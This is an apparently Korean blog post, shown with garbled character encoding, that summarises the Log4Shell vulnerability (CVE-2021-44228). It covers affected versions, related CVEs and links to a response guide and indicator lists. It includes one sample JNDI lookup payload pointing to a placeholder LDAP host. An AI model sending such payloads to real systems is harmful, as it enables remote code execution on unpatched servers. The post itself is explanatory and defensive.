์ด๋ฒ์ ์ ์ธ๊ณ์์ ์ด์์ธ Log4j๊ฐ ์์ด ์ธํฐ๋ท์์ ์ฐพ์ ์ ๋ณด๋ฅผ ํ๊ณณ์ ์ ๋ฆฌ ํด๋ดค๋ค!
1. Log4j ๋?
- Apache Software Foundation์์ ๊ฐ๋ฐ
- Java ๋ก๊น ํ๋ ์ ์ํฌ๋ก ํ๋ก๊ทธ๋จ์ ๋ก๊ทธ ๋จ๊ธฐ๋ ๋ผ์ด๋ธ๋ฌ๋ฆฌ
- ๋๋ถ๋ถ์ ํ๋ก๊ทธ๋จ์์ ์ฌ์ฉํ๊ณ ์์ด ๋์ฑ ์ฌ๊ฐํ ์ทจ์ฝ์ ์ด๋ค.
2. ์ด๋ค ์ทจ์ฝ์ ์ธ๊ฐ?
- CVE-2021-44228
- ํ์ค์ ์ฝ๋ ๋ง์ผ๋ก ์๋ฒ์ ์ํ๋ ๋ช ๋ น์ ๋ด๋ ค ๊ณต๊ฒฉ์๊ฐ ์ํ๋ ๊ธฐ๋ฅ ์ํ ๊ฐ๋ฅ.
- ๋๋ ํ ๋ฆฌ(LDAP ๋๋ ํ ๋ฆฌ)๋ฅผ ํตํด ๋ฐ์ดํฐ๋ฅผ ์ฐพ๊ธฐ ์ํด Java ํ๋ก๊ทธ๋จ์์ ์ฌ์ฉํ๋ Java Naming and Directory Interface (JNDI)๋ฅผ ์ฌ์ฉ
๋ฐฑ๋ฌธ์ด ๋ถ์ฌ์ผ๊ฒฌ, ์๋ ์์์ ๋ณด๋ฉด ์ด๋ค ๋๋์ธ์ง ์ดํด๊ฐ ๋๋ค
3. ๊ณต๊ฒฉ ๋ฐฉ์
${jndi:ldap://example.com/a}
- ์์ ๊ฐ์ ์ฝ๋ ํ์ค์ด๋ฉด ๊ณต๊ฒฉ์๊ฐ ์ํ๋ ๊ณณ example.com์ผ๋ก ์ ์ํ๋๋ก ๊ฐ๋ฅํ๋ค.
- ์ด ์ธ์๋ ์ฌ๋ฌ ์ ์ฉ๋ ๋ฐฉ๋ฒ์ด ๊ณ์ ๋ฑ์ฅํ๊ณ ์๋ค.
4. ์ํฅ์ ๋ฐ๋ ๋ฒ์ / CVE-2021-45105
o CVE-2021-44228
- 2.0-beta9 ~ 2.14.1 ๋ฒ์ (Log4j 2.12.2 ์ ์ธ)
o CVE-2021-45046
- 2.0-beta9 ~ 2.12.1 ๋ฐ 2.13.0 ~ 2.15.0 ๋ฒ์
o CVE-2021-4104
- 1.x ๋ฒ์
โป JMSAppender๋ฅผ ์ฌ์ฉํ์ง ์๋ ๊ฒฝ์ฐ ์ทจ์ฝ์ ์ํฅ ์์
5. ์ทจ์ฝ์ ๋์ ๊ฐ์ด๋
- ์๋ ์ฌ์ดํธ์ ์ฒจ๋ถํ์ผ์ ์ฝ๊ฒ ์ค๋ช ๋์ด ์์ด ์ฐธ๊ณ ํ๋ฉด ๋ ๊ฒ ๊ฐ๋ค
- ๊ณ์ํด์ ์๋ก์ด ์ทจ์ฝ์ ๊ณผ ๋ฒ์ ์ด ๋์ค๊ณ ์๊ณ ๋น๋ถ๊ฐ ๊ณ์ ๋ชจ๋ํฐ๋ง ํ์!!
https://www.boho.or.kr/data/guideView.do?bulletin_writing_sequence=36390
6. IOC ์ ๋ณด
- Log4j์ ๊ด๋ จ๋ IOC ์ ๋ณด๋ ์๋ ์ฌ์ดํธ์์ ์ ๋์ ์๋ค
https://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166
์ฐธ๊ณ ์ฌ์ดํธ
'๐จ ์ ๋ณด ๋ณด์ > News, IOC' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
Naver ํผ์ฑ ํ์ด์ง URL์ ํฌํจํ ์คํธ๋ฉ์ผ ์ ํฌ (0) | 2022.10.29 |
---|---|
[News] "๋ด PC ๋๋ณด๋ฏธ"๋ก ์์ฅํ ์ ์ฑ์ฝ๋ (0) | 2022.10.23 |
[News] '๋ ๋น' ์ฌ์์น ์๋คโฆ๋คํฌ์น์ ้ ๊ธฐ์ ๋ฐ์ดํฐ ํ์ทจ '์ฃผ์ฅ' (0) | 2022.08.13 |
[๊ทธ๊ฒ์ด ์๊ณ ์ถ๋ค] ๋ถํ ํด์ปค ํธ (0) | 2022.07.10 |
์คํ์ด๋๋งจ-๋ ธ์จ์ดํ ๋ค์ด๋ก๋๋ฅผ ์ฌ์นญํ ์ ์ฑ ํ์ผ (0) | 2021.12.29 |
๋๊ธ